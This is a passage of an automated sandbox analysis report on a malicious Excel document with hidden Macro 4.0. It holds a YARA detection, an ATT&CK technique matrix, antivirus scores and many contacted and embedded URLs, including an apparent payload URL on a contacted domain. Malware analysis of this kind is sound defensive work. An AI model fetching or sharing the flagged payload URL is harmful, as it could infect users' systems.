    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000001.00000002.366334982.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.366334982.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.366334982.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.366334982.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-550193913.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-550193913.xls10%VirustotalBrowse
    document-550193913.xls6%ReversingLabsDocument-Excel.Exploit.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    helendunnosteopathy.co.uk1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://helendunnosteopathy.co.uk/ds/2202.gif2%VirustotalBrowse
    https://helendunnosteopathy.co.uk/ds/2202.gif0%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    helendunnosteopathy.co.uk
    208.91.199.118
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
      high
      https://login.microsoftonline.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
        high
        https://shell.suite.office.com:144372A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
            high
            https://autodiscover-s.outlook.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                high
                https://cdn.entity.72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                  high
                  https://wus2-000.contentsync.72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                      high
                      https://powerlift.acompli.net72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v172A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                        high
                        https://cortana.ai72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                              high
                              https://helendunnosteopathy.co.uk/ds/2202.gifdocument-550193913.xlsfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://entitlement.diagnosticssdf.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                  high
                                  https://api.aadrm.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                        high
                                        https://cr.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                              high
                                              https://graph.ppe.windows.net72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                              high
                                                              https://graph.windows.net72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v272A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
